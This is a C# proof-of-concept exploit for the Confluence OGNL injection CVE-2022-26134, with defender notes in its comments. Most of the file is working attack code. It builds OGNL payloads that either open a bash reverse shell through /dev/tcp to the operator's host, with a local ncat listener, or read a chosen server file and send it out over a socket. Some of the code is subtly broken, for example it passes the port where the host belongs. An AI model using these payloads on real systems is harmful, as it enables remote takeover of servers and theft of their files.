// Exploit Title: Confluence Namespace OGNL Injection
// Date: June 3, 2022
// Exploit Author: Jacob Baines
// Vendor Homepage: https://www.atlassian.com/software/confluence
// Software Link: https://www.atlassian.com/software/confluence/download-archives
// Vendor Advisory: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
// Version: All LTS <= 7.13.6 and all others <= 7.18.0
// Tested on: 7.13.6 LTS / Ubuntu 20.04
// CVE : CVE-2022-26134
using System.Diagnostics;
namespace CVE_2022_26134;
/// <summary>
/// Command-line proof of concept for the Confluence OGNL injection tracked as CVE-2022-26134
/// (the identifier used by this file's namespace). It builds an OGNL expression string and
/// places it in the path of a single HTTPS GET request to the configured host.
/// </summary>
/// <remarks>
/// Defender notes, taken from the strings this program sends:
/// the request path begins with "${" and names javax.script.ScriptEngineManager and "nashorn",
/// so web, proxy and WAF logs can be searched for those markers (they may appear
/// percent-encoded, depending on how the client and the logger treat the path).
/// The reverse mode asks the server to start bash through java.lang.ProcessBuilder with a
/// /dev/tcp redirection, so a Confluence JVM with a bash child process and a new outbound TCP
/// connection is the host-side signal. The read mode uses java.nio.file.Files.readAllBytes and
/// java.net.Socket, which also shows up as an outbound connection from the JVM.
/// The client looks for a 302 response and an "X-Cmd-Response" header.
/// Mitigation is the fixed release named in the vendor advisory linked in the file header;
/// restricting outbound connections from the Confluence host limits both modes.
/// </remarks>
internal class Program
{
    /// <summary>
    /// Entry point. Copies every non-null parsed option into the matching LocalVar member
    /// and then calls <see cref="Start"/>.
    /// </summary>
    /// <param name="args">Raw command-line arguments handed to the option parser.</param>
    static void Main(string[] args)
    {
        Parser.Default.ParseArguments<CommandLineOptions>(args)
            .WithParsed(opts =>
            {
                if (opts.rhost != null)
                {
                    LocalVar.rhost = opts.rhost;
                }

                // No rport handling: that assignment is disabled in this version.

                if (opts.lhost != null)
                {
                    LocalVar.lhost = opts.lhost;
                }

                if (opts.lport != null)
                {
                    LocalVar.lport = opts.lport;
                }

                if (opts.protocol != null)
                {
                    LocalVar.protocol = opts.protocol;
                }

                if (opts.reverse != null)
                {
                    LocalVar.reverse = opts.reverse;
                }

                if (opts.fork != null)
                {
                    LocalVar.fork = opts.fork;
                }

                if (opts.nc != null)
                {
                    LocalVar.nc = opts.nc;
                }

                if (opts.read != null)
                {
                    LocalVar.read = opts.read;
                }
            });

        Start();
    }

    /// <summary>
    /// Chooses one of the two modes from LocalVar.reverse and LocalVar.read, builds the
    /// matching expression string and passes it to <see cref="PushData"/>.
    /// Prints a message and returns when both modes are selected; does nothing when neither is.
    /// </summary>
    static void Start()
    {
        // The two modes are mutually exclusive.
        if (LocalVar.reverse && LocalVar.read != null)
        {
            Console.WriteLine("Select only Reverse OR ReadFile not both");
            return;
        }

        if (LocalVar.reverse)
        {
            string shellExpression = ReverseShell(LocalVar.lhost, LocalVar.lport);
            PushData(LocalVar.rhost, shellExpression);

            if (!LocalVar.fork)
            {
                // Local listener runs on its own thread.
                var listenerThread = new Thread(() => StartListenerNCat(LocalVar.lport));
                listenerThread.Start();
            }

            return;
        }

        if (LocalVar.read != null)
        {
            string readExpression = ReadFile(LocalVar.lport, LocalVar.lport, LocalVar.read);
            PushData(LocalVar.rhost, readExpression);
        }
    }

    /// <summary>
    /// Starts a local ncat listener on <paramref name="lport"/> by launching cmd.exe.
    /// </summary>
    /// <param name="lport">Port number text placed into the ncat command line.</param>
    private static void StartListenerNCat(string lport)
    {
        // NOTE(review): lport is interpolated into a cmd.exe command line without validation,
        // so whatever text the operator supplies is interpreted by the local shell.
        var startInfo = new ProcessStartInfo
        {
            CreateNoWindow = false,
            WindowStyle = ProcessWindowStyle.Normal,
            FileName = "cmd.exe",
            Arguments = $"/C ncat -lvnp {lport}",
        };

        var listener = new Process { StartInfo = startInfo };
        listener.Start();
    }

    /// <summary>
    /// Prints the request URL, sends one HTTPS GET to it and records the numeric status code
    /// (or "Server unreachable" on <see cref="HttpRequestException"/>) in a local variable.
    /// </summary>
    /// <param name="domain">Host part of the URL.</param>
    /// <param name="exploit">Expression string used as the URL path.</param>
    private static async void PushData(string domain, string exploit)
    {
        string url = $"https://{domain}/{exploit}";
        Console.WriteLine(url);

        var result = "";
        var httpClientHandler = new HttpClientHandler { AllowAutoRedirect = false };

        try
        {
            using var client = new HttpClient();
            HttpResponseMessage response = await client.GetAsync(url);

            int status = (int)response.StatusCode;

            // dump contents of header
            //Console.WriteLine(response.Headers.ToString());
            if (status == 302)
            {
                // Writes whatever TryGetValues produced for the X-Cmd-Response header.
                response.Headers.TryGetValues("X-Cmd-Response", out IEnumerable<string> cmdHeader);
                Console.WriteLine(cmdHeader);
            }

            // The status code is recorded the same way for success and failure.
            result = status.ToString();
        }
        catch (HttpRequestException)
        {
            result = "Server unreachable";
        }
    }

    /// <summary>
    /// Builds the expression string for the reverse mode from the listener address.
    /// </summary>
    /// <param name="lhost">Listener host placed into the /dev/tcp path.</param>
    /// <param name="lport">Listener port placed into the /dev/tcp path.</param>
    /// <returns>The expression string held in the local <c>expression</c>.</returns>
    static string ReverseShell(string lhost, string lport)
    {
        Console.WriteLine("[+] Generating a reverse shell payload");

        // Server-side signal: ProcessBuilder starting bash with a /dev/tcp redirection.
        string expression = string.Concat(
            "${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/'",
            lhost,
            "'/'",
            lport,
            "' 0>&1').start())}");

        string urlEncoded = HttpUtility.UrlEncodeUnicode(expression);
        return expression;
    }

    /// <summary>
    /// Builds the expression string for the read mode from a file path and a socket address.
    /// </summary>
    /// <param name="lhost">Host given to java.net.Socket in the expression.</param>
    /// <param name="lport">Port given to java.net.Socket in the expression.</param>
    /// <param name="FilePath">Path given to java.nio.file.Paths.get in the expression.</param>
    /// <returns>The expression string held in the local <c>expression</c>.</returns>
    static string ReadFile(string lhost, string lport, string FilePath)
    {
        Console.WriteLine("[+] Generating a payload to read: ' + args.read_file");

        // Server-side signal: the JVM reads a file and opens an outbound socket.
        string expression = string.Concat(
            "${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('",
            FilePath,
            "' )));var sock = new java.net.Socket('",
            lhost,
            "', '",
            lport,
            "'); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}");

        string urlEncoded = HttpUtility.UrlEncodeUnicode(expression);
        return expression;
    }
}